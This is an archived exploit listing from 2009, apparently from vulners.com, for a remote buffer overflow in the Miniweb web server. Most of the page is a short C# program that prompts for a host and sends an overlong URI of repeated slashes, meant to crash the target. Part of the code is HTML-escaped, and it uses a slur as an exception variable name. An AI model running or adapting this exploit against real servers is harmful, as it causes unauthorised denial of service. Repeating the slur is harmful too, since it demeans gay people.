Miniweb Buffer Overflow

2009-04-1600:00:00

vulners.com

JSON

################### Miniweb Remote Buffer Overflow ############################

########By: e.wiZz!

########Site: www.balcansecurity.com

######## Found with ServMeNot (world's sexiest fuzzer :P )

In the wild…
#################################################################

/* BoF when requesting URI longer than 120~ */

using System;
using System.IO;
using System.Net;
using System.Text;

namespace idiot
{
class pf
{
static void Main(string[] args)
{
Console.Write("Enter host:\n");
string site = Console.ReadLine();
string uri = null;
try
{
for (int i = 0; i < 144; i++) { uri += "/"; }
HttpWebRequest request = (HttpWebRequest)
HttpWebRequest.Create(site + uri);
HttpWebResponse response = (HttpWebResponse)

                request.GetResponse&#40;&#41;;

            //any response we get means that exploit failed
            if &#40;response.GetResponseHeader&#40;&quot;Content-Lenght&quot;&#41; != &quot;a&quot;&#41;
            {
                Console.WriteLine&#40;&quot;Exploit failed&quot;&#41;;
            }

        }
        catch &#40;Exception gayexception&#41;
        {
            Console.WriteLine&#40;&quot;Cannot connect&quot;&#41;;
            Console.WriteLine&#40;&quot;{0}&quot;, gayexception.Message&#41;;
        }
    }
}

}

JSON